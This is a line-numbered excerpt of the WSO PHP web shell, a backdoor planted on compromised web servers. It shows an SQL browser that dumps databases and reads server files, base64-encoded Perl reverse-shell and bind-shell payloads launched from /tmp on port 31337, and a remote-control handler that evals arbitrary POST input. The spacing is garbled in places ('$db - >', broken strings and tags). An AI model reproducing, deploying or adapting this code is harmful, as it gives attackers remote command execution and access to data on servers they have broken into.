1436 header("Content-Disposition: attachment; filename=dump.sql");
1437 header("Content-Type: text/plain");
1438 foreach($_POST['tbl'] as $v) $db - > dump($v);
1439 exit;
1440 }
1441 elseif($fp = @fopen($_POST['file'], 'w')) {
1442 foreach($_POST['tbl'] as $v) $db - > dump($v, $fp);
1443 fclose($fp);
1444 unset($_POST['p2']);
1445 } else die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>');
1446 }
1447 wsoHeader();
1448 echo " < h1 > Sql browser < /h1><div class=content> < form name = 'sf'
1449 method = 'post'
1450 onsubmit = 'fs(this);' > < table cellpadding = '2'
1451 cellspacing = '0' > < tr >
1452 < td > Type < /td><td>Host</td > < td > Login < /td><td>Password</td > < td > Database < /td><td></td > < /tr><tr> < input type = hidden name = a value = Sql > < input type = hidden name = p1 value = 'query' > < input type = hidden name = p2 value = '' > < input type = hidden name = c value = '" . htmlspecialchars($GLOBALS['
1453 cwd ']) . "' > < input type = hidden name = charset value = '" . (isset($_POST['
1454 charset ']) ? $_POST['
1455 charset '] : '
1456 ') . "' >
1457 < td > < select name = 'type' > < option value = 'mysql'
1458 ";
1459 if (@$_POST['type'] == 'mysql') echo 'selected';
1460 echo ">MySql</option><option value='pgsql' ";
1461 if (@$_POST['type'] == 'pgsql') echo 'selected';
1462 echo ">PostgreSql</option></select></td> < td > < input type = text name = sql_host value = \"".(empty($_POST['sql_host']) ? 'localhost' : htmlspecialchars($_POST['sql_host'])).
1463 "\"></td> < td > < input type = text name = sql_login value = \"".(empty($_POST['sql_login']) ? 'root' : htmlspecialchars($_POST['sql_login'])).
1464 "\"></td> < td > < input type = text name = sql_pass value = \"".(empty($_POST['sql_pass']) ? '' : htmlspecialchars($_POST['sql_pass'])).
1465 "\"></td><td>";
1466 $tmp = "<input type=text name=sql_base value=''>";
1467 if (isset($_POST['sql_host'])) {
1468 if ($db - > connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
1469 switch ($_POST['charset']) {
1470 case "Windows-1251":
1471 $db - > setCharset('cp1251');
1472 break;
1473 case "UTF-8":
1474 $db - > setCharset('utf8');
1475 break;
1476 case "KOI8-R":
1477 $db - > setCharset('koi8r');
1478 break;
1479 case "KOI8-U":
1480 $db - > setCharset('koi8u');
1481 break;
1482 case "cp866":
1483 $db - > setCharset('cp866');
1484 break;
1485 }
1486 $db - > listDbs();
1487 echo "<select name=sql_base><option value=''></option>";
1488 while ($item = $db - > fetch()) {
1489 list($key, $value) = each($item);
1490 echo '<option value="'.$value.
1491 '" '.($value == $_POST['sql_base'] ? 'selected' : '').
1492 '>'.$value.
1493 '</option>';
1494 }
1495 echo '</select>';
1496 } else echo $tmp;
1497 } else echo $tmp;
1498 echo "</td> < td > < input type = submit value = '>>'
1499 onclick = 'fs(d.sf);' > < /td> < td > < input type = checkbox name = sql_count value = 'on'
1500 " . (empty($_POST['sql_count']) ? '' : ' checked') . " > count the number of rows < /td> < /tr> < /table> < script >
1501 s_db = '" . @addslashes($_POST['
1502 sql_base ']) . "';
1503
1504 function fs(f) {
1505 if (f.sql_base.value != s_db) {
1506 f.onsubmit = function() {};
1507 if (f.p1) f.p1.value = '';
1508 if (f.p2) f.p2.value = '';
1509 if (f.p3) f.p3.value = '';
1510 }
1511 }
1512
1513 function st(t, l) {
1514 d.sf.p1.value = 'select';
1515 d.sf.p2.value = t;
1516 if (l && d.sf.p3) d.sf.p3.value = l;
1517 d.sf.submit();
1518 }
1519
1520 function is() {
1521 for (i = 0; i < d.sf.elements['tbl[]'].length; ++i)
1522 d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;
1523 } < /script>";
1524 if (isset($db) && $db - > link) {
1525 echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
1526 if (!empty($_POST['sql_base'])) {
1527 $db - > selectdb($_POST['sql_base']);
1528 echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";
1529 $tbls_res = $db - > listTables();
1530 while ($item = $db - > fetch($tbls_res)) {
1531 list($key, $value) = each($item);
1532 if (!empty($_POST['sql_count'])) $n = $db - > fetch($db - > query('SELECT COUNT(*) as n FROM '.$value.
1533 ''));
1534 $value = htmlspecialchars($value);
1535 echo "<nobr><input type='checkbox' name='tbl[]' value='".$value.
1536 "'> <a href=# onclick=\"st('".$value.
1537 "',1)\">".$value.
1538 "</a>".(empty($_POST['sql_count']) ? ' ' : " <small>({$n['n']})</small>").
1539 "</nobr><br>";
1540 }
1541 echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
1542 if (@$_POST['p1'] == 'select') {
1543 $_POST['p1'] = 'query';
1544 $_POST['p3'] = $_POST['p3'] ? $_POST['p3'] : 1;
1545 $db - > query('SELECT COUNT(*) as n FROM '.$_POST['p2']);
1546 $num = $db - > fetch();
1547 $pages = ceil($num['n'] / 30);
1548 echo "<script>d.sf.onsubmit=function(){st(\"".$_POST['p2'].
1549 "\", d.sf.p3.value)}</script><span>".$_POST['p2'].
1550 "</span> ({$num['n']} records) Page # <input type=text name='p3' value=".((int) $_POST['p3']).
1551 ">";
1552 echo " of $pages";
1553 if ($_POST['p3'] > 1) echo " <a href=# onclick='st(\"".$_POST['p2'].
1554 '", '.($_POST['p3'] - 1).
1555 ")'>< Prev</a>";
1556 if ($_POST['p3'] < $pages) echo " <a href=# onclick='st(\"".$_POST['p2'].
1557 '", '.($_POST['p3'] + 1).
1558 ")'>Next ></a>";
1559 $_POST['p3']--;
1560 if ($_POST['type'] == 'pgsql') $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].
1561 ' LIMIT 30 OFFSET '.($_POST['p3'] * 30);
1562 else $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].
1563 '` LIMIT '.($_POST['p3'] * 30).
1564 ',30';
1565 echo "<br><br>";
1566 }
1567 if ((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) {
1568 $db - > query(@$_POST['p2']);
1569 if ($db - > res !== false) {
1570 $title = false;
1571 echo '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">';
1572 $line = 1;
1573 while ($item = $db - > fetch()) {
1574 if (!$title) {
1575 echo '<tr>';
1576 foreach($item as $key => $value) echo '<th>'.$key.
1577 '</th>';
1578 reset($item);
1579 $title = true;
1580 echo '</tr><tr>';
1581 $line = 2;
1582 }
1583 echo '<tr class="l'.$line.
1584 '">';
1585 $line = $line == 1 ? 2 : 1;
1586 foreach($item as $key => $value) {
1587 if ($value == null) echo '<td><i>null</i></td>';
1588 else echo '<td>'.nl2br(htmlspecialchars($value)).
1589 '</td>';
1590 }
1591 echo '</tr>';
1592 }
1593 echo '</table>';
1594 } else {
1595 echo '<div><b>Error:</b> '.htmlspecialchars($db - > error()).
1596 '</div>';
1597 }
1598 }
1599 echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>";
1600 if (!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile')) echo htmlspecialchars($_POST['p2']);
1601 echo "</textarea><br/><input type=submit value='Execute'>";
1602 echo "</td></tr>";
1603 }
1604 echo "</table></form><br/>";
1605 if ($_POST['type'] == 'mysql') {
1606 $db - > query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
1607 if ($db - > fetch()) echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>";
1608 }
1609 if (@$_POST['p1'] == 'loadfile') {
1610 $file = $db - > loadFile($_POST['p2']);
1611 echo '<br/><pre class=ml1>'.htmlspecialchars($file['file']).
1612 '</pre>';
1613 }
1614 } else {
1615 echo htmlspecialchars($db - > error());
1616 }
1617 echo '</div>';
1618 wsoFooter();
1619 }
1620
1621 function actionNetwork() {
1622 wsoHeader();
1623 $back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
1624 $bind_port_p = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
1625 echo "<h1>Network tools</h1><div class=content> < form name = 'nfp'
1626 onSubmit = \"g(null,null,'bpp',this.port.value);return false;\"> < span > Bind port to / bin / sh[perl] < /span><br/ >
1627 Port: < input type = 'text'
1628 name = 'port'
1629 value = '31337' > < input type = submit value = '>>' >
1630 < /form> < form name = 'nfp'
1631 onSubmit = \"g(null,null,'bcp',this.server.value,this.port.value);return false;\"> < span > Back - connect[perl] < /span><br/ >
1632 Server: < input type = 'text'
1633 name = 'server'
1634 value = '" . $_SERVER['
1635 REMOTE_ADDR '] . "' > Port: < input type = 'text'
1636 name = 'port'
1637 value = '31337' > < input type = submit value = '>>' >
1638 < /form><br>";
1639 if (isset($_POST['p1'])) {
1640 function cf($f, $t) {
1641 $w = @fopen($f, "w") or @function_exists('file_put_contents');
1642 if ($w) {
1643 @fwrite($w, base64_decode($t));
1644 @fclose($w);
1645 }
1646 }
1647 if ($_POST['p1'] == 'bpp') {
1648 cf("/tmp/bp.pl", $bind_port_p);
1649 $out = wsoEx("perl /tmp/bp.pl ".$_POST['p2'].
1650 " 1>/dev/null 2>&1 &");
1651 sleep(1);
1652 echo "<pre class=ml1>$out
1653 " . wsoEx("
1654 ps aux | grep bp.pl ") . " < /pre>";
1655 unlink("/tmp/bp.pl");
1656 }
1657 if ($_POST['p1'] == 'bcp') {
1658 cf("/tmp/bc.pl", $back_connect_p);
1659 $out = wsoEx("perl /tmp/bc.pl ".$_POST['p2'].
1660 " ".$_POST['p3'].
1661 " 1>/dev/null 2>&1 &");
1662 sleep(1);
1663 echo "<pre class=ml1>$out
1664 " . wsoEx("
1665 ps aux | grep bc.pl ") . " < /pre>";
1666 unlink("/tmp/bc.pl");
1667 }
1668 }
1669 echo '</div>';
1670 wsoFooter();
1671 }
1672
1673 function actionRC() {
1674 if (!@$_POST['p1']) {
1675 $a = array("uname" => php_uname(), "php_version" => phpversion(), "wso_version" => WSO_VERSION, "safemode" => @ini_get('safe_mode'));
1676 echo serialize($a);
1677 } else {
1678 eval($_POST['p1']);
1679 }
1680 }
1681 if (empty($_POST['a']))
1682 if (isset($default_action) && function_exists('action'.$default_action)) $_POST['a'] = $default_action;
1683 else $_POST['a'] = 'SecInfo';
1684 if (!empty($_POST['a']) && function_exists('action'.$_POST['a'])) call_user_func('action'.$_POST['a']);
1685 exit;